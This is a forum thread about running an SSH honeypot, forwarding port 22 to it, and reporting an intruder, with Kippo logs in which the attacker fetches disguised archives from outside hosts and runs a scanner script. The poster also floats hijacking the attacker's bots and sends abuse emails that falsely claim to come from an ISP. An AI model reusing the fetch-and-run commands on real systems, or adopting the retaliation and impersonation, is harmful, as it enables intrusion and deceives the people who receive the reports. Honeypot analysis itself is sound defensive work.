Port forwarding to another server on a different network

[w1z4rd]

So I installed a ssh honeypot server on a server in Germany.

Host: 85.25.130.112
Username: root
Password: 123456

Now the honeypot software relies heavily on perl, twisted, python 2.6 and a couple of other related libs. With the server mentioned above it was easy as heck to install (Debian based system), but on another server located in the US... well, CentOS 5 and python 2.6 do NOT play well and I am having great difficulty getting the honeypot to work on that machine. So I figued I would just forward ssh sessions on port 22 on the CentOS server to port 22 on the Debian server and just use the honeypot installed on the debian server for the centos server.

Neither of these commands seem to do the job:

iptables -t nat -A PREROUTING -p tcp --dport 22 -j DNAT --to 85.25.130.112

&

iptables -t nat -A PREROUTING -p tcp --dport 22 -j DNAT --to 85.25.130.112:22

What am I missing here? Is it possible to do what I want?

 

[@udiS3]

Does the machine doing the SRC nat have visibility on the server that it is forwarding to?
i.e. can they ping each other?

You have the src nat taken care of but what about the packets coming back?

You are missing DST/masquerade nat rules!!!

 

[w1z4rd]

My first honeypot log

Got the files and everything: http://www.wikileaks.za.org:8022/?l=20111005-103438-8771.log (link may not work in the near future, only up for a day or two).

 

[thisgeek]

Looking at that session, it's just a script kiddie with no real clue what they are doing.
Actually, it's amazing how persistent they are with running a command that obviously doesn't work.


So... now you have the info/ip/files, what are you going to do with it?

 

[w1z4rd]

Looking at that session, it's just a script kiddie with no real clue what they are doing.
Actually, it's amazing how persistent they are with running a command that obviously doesn't work.


So... now you have the info/ip/files, what are you going to do with it?

Use his bot software and configuration to mess with him I recon. I know know what password he uses to communicate with his bots, where they meet, which irc servers his C&C bots run and such. Also got his mail.ru email that the script was meant to report to, so I may just mess him around.

Another option is I have both IP`s he logged in from (both are from Romania), I also have a record of several servers he connected to pull the scripts from, and all the IRC information, so I guess I could contact all the admins related to that and remove a bunch of his assets.

 

[thisgeek]

Good stuff.

If you do anything with it, would be nice to know exactly what you got up to.

 

[ITCynic]

Why do you run a honeypot if I may ask ?

 

[w1z4rd]

Why do you run a honeypot if I may ask ?

For educational and entertainment reasons.

 

[ITCynic]

OK, I can relate to that.

I ran one from my home ADSL once and SAIX ended up blocking email (port 25) on my account so at least you doing the right moves by not running the honeypot from home.

 

[w1z4rd]

OK, I can relate to that.

I ran one from my home ADSL once and SAIX ended up blocking email (port 25) on my account so at least you doing the right moves by not running the honeypot from home.

Also... this is a limited SSH honeypot, you cant abuse it...

Nothing is going to get banned from this, as you cant abuse it. Did you setup an open relay on a home connection? hehe Im sure that got your port 25 blocked quickly with telkom.

 

[ITCynic]

Cant remember exactly what I configured as it was at lest 3 years ago. Was fun while it lasted.

 

[w1z4rd]

Good stuff.

If you do anything with it, would be nice to know exactly what you got up to.

Okay, finally had time to send the emails out. This email was sent to the hackers ISP:

Hi,

I represent an Internet Service Provider in South Africa. Due to the lack of accountability online and certain geographical areas being constant threats we have a zero tolerance approach to hacking and other malicious activity online. We have a simple yet effective approach to deal with this problem. If we notice constant hack attempts from a single ISP we simply firewall its entire IP range of that ISP from all our system. There is not enough legal traffic to warrant the security risks presented by your network.

This is your first and final courtesy request to ask you please to effectively deal with the hacker and the hacking attempts. We run several honeypots and one of your network users have repeatedly being caught in our honeypots.

The following are logs from one of the honeypots (please note, these logs will only be up for a short time):

1) First hacking attempt:  http://85.25.130.112:8022/?l=20111005-054230-6879.log

Hacking source IP: 86.126.169.78
Victim IP: 85.25.130.112

2) Second hacking attempt: http://85.25.130.112:8022/?l=20111005-103438-8771.log

Hacking source IP: 82.79.205.203
Victim IP: 85.25.130.112

3) Third hacking attempt: http://85.25.130.112:8022/?l=20111005-212416-7920.log

Hacking source IP: 82.79.205.190
Victim IP: 85.25.130.112

4) Fourth hacking attempt: http://85.25.130.112:8022/?l=20111006-215007-9652.log

Hacking source IP: 79.116.168.191
Victim IP: 85.25.130.112


Please note, you  have 3 business days to get back to us to let us know what actions you have taken against the user or your ISPs network ranges will be firewalled from our systems world wide.

Kind regards,
NAME REMOVED

Below are text based logs of the above offending actions:

//start of logs.



2) cat * | grep "82.79.205.203"
2011-10-05 10:34:32+0000 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 82.79.205.203:4692 (85.25.130.112:22) [session: 1955]
2011-10-05 10:34:33+0000 [HoneyPotTransport,1955,82.79.205.203] starting service ssh-userauth
2011-10-05 10:34:35+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] root trying auth none
2011-10-05 10:34:35+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] root trying auth keyboard-interactive
2011-10-05 10:34:37+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] login attempt [root/123456] succeeded
2011-10-05 10:34:37+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] root authenticated with keyboard-interactive
2011-10-05 10:34:37+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] starting service ssh-connection
2011-10-05 10:34:38+0000 [SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] got channel session request
2011-10-05 10:34:52+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: cd /var/tmp
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: wget http://system-arhive.do.am/scanner/gosh.jpg ; tar zxvf gosh.jpg ; cd gosh ; chmod +x *
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: wget http://system-arhive.do.am/scanner/gosh.jpg
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Starting factory <HTTPProgressDownloader: http://system-arhive.do.am/scanner/gosh.jpg>
2011-10-05 10:35:33+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: ./go.sh 58.22
2011-10-05 10:35:33+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: ./go.sh 58.22
2011-10-05 10:35:38+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: ./go.sh 58.22
2011-10-05 10:35:38+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: ./go.sh 58.22
2011-10-05 10:36:14+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: cd /var/tmp
2011-10-05 10:36:22+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: cd .logwget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg    rm -rf bnc.jpg    
2011-10-05 10:36:22+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: cd .logwget http://4u.moy.su/bnc.jpg
2011-10-05 10:36:22+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: tar zxvf bnc.jpg    rm -rf bnc.jpg
2011-10-05 10:36:31+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD:
2011-10-05 10:36:34+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: cd .logwget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg    rm -rf bnc.jpg    
2011-10-05 10:36:34+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: cd .logwget http://4u.moy.su/bnc.jpg
2011-10-05 10:36:34+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: tar zxvf bnc.jpg    rm -rf bnc.jpg
2011-10-05 10:36:42+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: cd .logwget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg   
2011-10-05 10:36:42+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: cd .logwget http://4u.moy.su/bnc.jpg
2011-10-05 10:36:42+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: tar zxvf bnc.jpg
2011-10-05 10:37:12+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: wget http://system-arhive.do.am/emech/system.jpg ; tar zxvf system.jpg ; cd .system ; chmod +x *
2011-10-05 10:37:12+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: wget http://system-arhive.do.am/emech/system.jpg
2011-10-05 10:37:12+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Starting factory <HTTPProgressDownloader: http://system-arhive.do.am/emech/system.jpg>
//end of logs

And this email was sent to the hosts where he hosts his malicious scripts:

Hi

I represent an Internet Service Provider in South Africa. Due to the lack of accountability online and certain geographical areas being constant threats we have a zero tolerance approach to hacking and other malicious activity online. We have a simple yet effective approach to deal with this problem. If we notice constant hack attempts from a single ISP we simply firewall its entire IP range of that ISP from all our system. There is not enough legal traffic to warrant the security risks presented by your network.

This is your first and final courtesy request to ask you please to effectively deal with the hacker and the hacking attempts. We run several honeypots and one of your systems has proven to be a host for malicious hacking scripts.


The following are logs from one of the honeypots (please note, these logs will only be up for a short time):

1) Second hacking attempt: http://85.25.130.112:8022/?l=20111005-103438-8771.log

Hacking source IP: 82.79.205.203
Victim IP: 85.25.130.112

Log sample:

2011-10-05 10:34:33+0000 [HoneyPotTransport,1955,82.79.205.203] starting service ssh-userauth
2011-10-05 10:34:35+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] root trying auth none
2011-10-05 10:34:35+0000 [SSHService ssh-userauth on HoneyPotTransport,1955,82.79.205.203] root trying auth keyboard-interactive
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: wget http://system-arhive.do.am/scanner/gosh.jpg ; tar zxvf gosh.jpg ; cd gosh ; chmod +x *
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Command found: wget http://system-arhive.do.am/scanner/gosh.jpg
2011-10-05 10:35:06+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] Starting factory <HTTPProgressDownloader: http://system-arhive.do.am/scanner/gosh.jpg>
2011-10-05 10:35:33+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1955,82.79.205.203] CMD: ./go.sh 58.22


As you can see by the above log, the above domain: system-arhive.do.am resolves to an IP in your IP range:

193.109.247.54 - Geo Information
IP Address	193.109.247.54
Host	s54.ucoz.net
Location	VG VG, Virgin Islands, British
City	-, - -
Organization	Compubyte Limited
ISP	Compubyte Limited
AS Number	AS29076 Citytelecom.ru

Please note, you  have 3 business days to get back to us to let us know what actions you have taken against the user or your ISPs network ranges will be firewalled from our systems world wide.

Kind regards,

NAME REMOVED

I had to remove a lot of the log files from this post to fit into this post (the original post had 40k characters with logs, and the forum only allows 10k characters)

 

[The_Unbeliever]

Good stuff!

 

[thisgeek]

Very nice. Let us know if you get any response from the service providers in question.

 

[avert]

nc -l -p 22 -c "nc 85.25.130.112 22"